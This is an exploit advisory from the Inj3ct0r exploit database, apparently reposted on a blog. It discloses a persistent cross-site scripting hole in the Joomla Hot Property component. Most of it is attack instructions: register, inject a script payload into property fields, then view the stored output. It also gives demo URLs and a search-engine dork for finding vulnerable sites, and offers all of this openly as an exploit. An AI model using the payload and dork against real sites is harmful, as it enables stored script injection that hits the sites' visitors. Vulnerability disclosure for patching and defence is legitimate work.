Joomla Component com_hotproperty Persistent XSS Vulnerability
<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Joomla Component com_hotproperty Persistent XSS Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=============================================================
Joomla Component com_hotproperty Persistent XSS Vulnerability
=============================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /’ __ /’__` / __ /’__` 0
0 /_, ___ /_/_ ___ ,_/ / _ ___ 1
1 /_/ /’ _ ` / /_/__<_ /’___ / /`’__ 0
0 / / / / __/ _ _ / 1
1 _ _ __ ____/ ____\ __\ ____/ _ 0
0 /_//_//_/ _ /___/ /____/ /__/ /___/ /_/ 1
1 ____/ >> Exploit database separated by exploit 0
0 /___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ########################################## 1
0 I’m Sid3^effects member from Inj3ct0r Team 1
1 ########################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
Name : Joomla com_hotproperty Persistent XSS Vulnerability
Date : july 24,2010
Critical Level : HIGH
vendor URL :http://www.mosets.com/hotproperty/
Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
Dork :inurl:com_jomestate
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,KeDar,Sonic,gunslinger_:D
greetz to :www.topsecure.net,SeeMe,**RoAd_KiLlEr**,indoushka,Sn!pEr.S!Te
All ICW members,my friends,Hack0wn and Milw0rm 
luv y0 guyz
#######################################################################################################
Description:
Now you can list and manage your properties easily using Hot Property together with the best open source Web Content Management System -
Joomla!. Your property can be Real Estate, Automobile, Boats, Painting, Books or anything at all! If you wish to showcase your products
effectively, Hot Property is your answer. With Hot Property, you can:
- Run a Real Estate website
- Run a Vacation Rentals website when you buy the optional
- Availability Extension
- Run an Auto website
- Run a DVDs website
###############################################################################################################
Xploit 
ersistent XSS Vulnerability
Step 1 : Register and goto your panel ,add a new property
DEMO URL :http://demo.mosets.com/hotproperty/index.php?option=com_hotproperty&task=addprop&Itemid=26
Step 2 : Insert your evil xss scripts in the fields
Attack Pattern:"><script>alert("inj3ct0r")</script>
Step 3 : Now go and check the home page or check your property.
DEMO URL :http://demo.mosets.com/hotproperty/index.php?option=com_hotproperty&Itemid=26
Screenshot :http://img812.imageshack.us/img812/6825/proper.png
###############################################################################################################
# 0day no more
# Sid3^effects
# <a href=’http://inj3ct0r.com/’>Inj3ct0r.com</a> [2010-07-24]</pre><script type=’text/javascript’>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src=’" + gaJsHost + "google-analytics.com/ga.js’ type=’text/javascript’%3E%3C/script%3E"));</script><script type=’text/javascript’>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
Source: http://inj3ct0r.com/exploits/13457
Leave a Reply